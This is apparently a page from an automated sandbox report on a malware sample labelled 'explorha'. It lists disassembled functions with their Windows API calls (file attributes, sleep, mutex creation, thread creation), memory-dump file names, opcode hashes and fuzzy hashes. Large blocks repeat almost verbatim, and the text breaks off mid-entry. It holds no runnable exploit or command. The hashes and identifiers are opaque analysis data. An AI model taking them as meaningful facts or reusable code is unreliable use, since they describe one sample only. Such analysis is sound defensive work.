                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: b17e3cdfbfffa897c3361e30d9ccb10cf3419e84e0e0662576ac72cfadadb980
                                                                                                      • Instruction ID: 49493b65334d953f13a89a210c14841ac0dc690d74c65823fb2cb3b6535ba6f1
                                                                                                      • Opcode Fuzzy Hash: b17e3cdfbfffa897c3361e30d9ccb10cf3419e84e0e0662576ac72cfadadb980
                                                                                                      • Instruction Fuzzy Hash: 7A3166316001048BEF08EBBCCD89B9DB676FF86314F248218E055EB3D9CB7599808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086A01D Relevance: 4.6, APIs: 3, Instructions: 123sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 3139 86a01d-86a03d GetFileAttributesA 3142 86a03f-86a04b 3139->3142 3143 86a06b-86a087 3139->3143 3144 86a061-86a068 call 87ecf8 3142->3144 3145 86a04d-86a05b 3142->3145 3146 86a0b5-86a0d4 3143->3146 3147 86a089-86a095 3143->3147 3144->3143 3145->3144 3150 86a414-86a458 call 8982fa * 3 Sleep CreateMutexA 3145->3150 3148 86a0d6-86a0e2 3146->3148 3149 86a102-86a3e6 call 879750 3146->3149 3152 86a097-86a0a5 3147->3152 3153 86a0ab-86a0b2 call 87ecf8 3147->3153 3155 86a0e4-86a0f2 3148->3155 3156 86a0f8-86a0ff call 87ecf8 3148->3156 3172 86a45e-86a464 3150->3172 3152->3150 3152->3153 3153->3146 3155->3150 3155->3156 3156->3149 3173 86a466 3172->3173 3174 86a467-86a46f call 897cb9 3172->3174
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 0086A020
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: d9725ff55ff549158a077bede451c5130360605c539133e03153f2c68cea4d3b
                                                                                                      • Instruction ID: cb103111119b374de23f44a7c5c8bf9ca2c190246f0d1b67e060f75e4c1a61f1
                                                                                                      • Opcode Fuzzy Hash: d9725ff55ff549158a077bede451c5130360605c539133e03153f2c68cea4d3b
                                                                                                      • Instruction Fuzzy Hash: B0310971600504DBEB0CEB6CCD89B6DB672FB86318F248258E415EB3D6CB7599808B63
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086A152 Relevance: 4.6, APIs: 3, Instructions: 122sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 0086A155
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: f9b61f4c14a8b760f2acb22aa3e63dd8deeba2fe9ede26a56d72adbb8eaaf958
                                                                                                      • Instruction ID: e5309cf94ba3761a3ade917f687e532a3505d13f1484b2eb37da90720420ba68
                                                                                                      • Opcode Fuzzy Hash: f9b61f4c14a8b760f2acb22aa3e63dd8deeba2fe9ede26a56d72adbb8eaaf958
                                                                                                      • Instruction Fuzzy Hash: 7B3126716001049BEB0CDB6CDD89BADB772FB86314F248218E425EB3D6CB7699808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086A287 Relevance: 4.6, APIs: 3, Instructions: 121sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 0086A28A
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesCreateFileMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 396266464-0
                                                                                                      • Opcode ID: 6764ef9b44216c8afae9c602fa983929970d1700da82fbed14e1cf5f4cb1310b
                                                                                                      • Instruction ID: bd3472fbc751c413858c18e785e8e53c5e2d0a4cacabe20d01fbf7eac349ef43
                                                                                                      • Opcode Fuzzy Hash: 6764ef9b44216c8afae9c602fa983929970d1700da82fbed14e1cf5f4cb1310b
                                                                                                      • Instruction Fuzzy Hash: 5A3126717401089BEB0CDB6CCE89BADB762FB85314F248218E414FB7D6CB7599808B12
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00878320 Relevance: 4.5, APIs: 3, Instructions: 21threadsleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00018200,00000000,00000000,00000000), ref: 00878336
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00018290,00000000,00000000,00000000), ref: 00878347
                                                                                                      • Sleep.KERNELBASE(00007530), ref: 00878355
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread$Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 422425972-0
                                                                                                      • Opcode ID: 56897797c1fbbae334c4d1c5c2d4d70c11eb701fc4a1ee426f6ade139e9fe91f
                                                                                                      • Instruction ID: 18c24bce9ac6ab2768f786134c71d389544cb130befa79857d9089f861c28342
